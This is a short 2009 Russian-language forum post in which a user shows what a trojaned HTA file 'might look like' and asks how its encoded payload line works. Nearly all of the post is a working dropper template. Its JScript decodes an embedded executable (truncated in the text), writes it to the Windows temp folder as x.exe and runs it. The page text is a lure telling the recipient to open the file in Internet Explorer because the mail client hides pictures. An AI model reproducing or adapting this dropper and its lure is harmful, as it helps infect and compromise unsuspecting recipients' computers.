06.02.2009, 18:20
|
|
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме:
127764
Репутация:
-1
|
|
затрояненный HTA-файл может выглядеть примерно так.
<font color="#008000"><HTML>
<HEAD><hta:application />
<SCRIPT language="JavaScript">
code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла
var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();
var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его
</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят
code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
|
|
|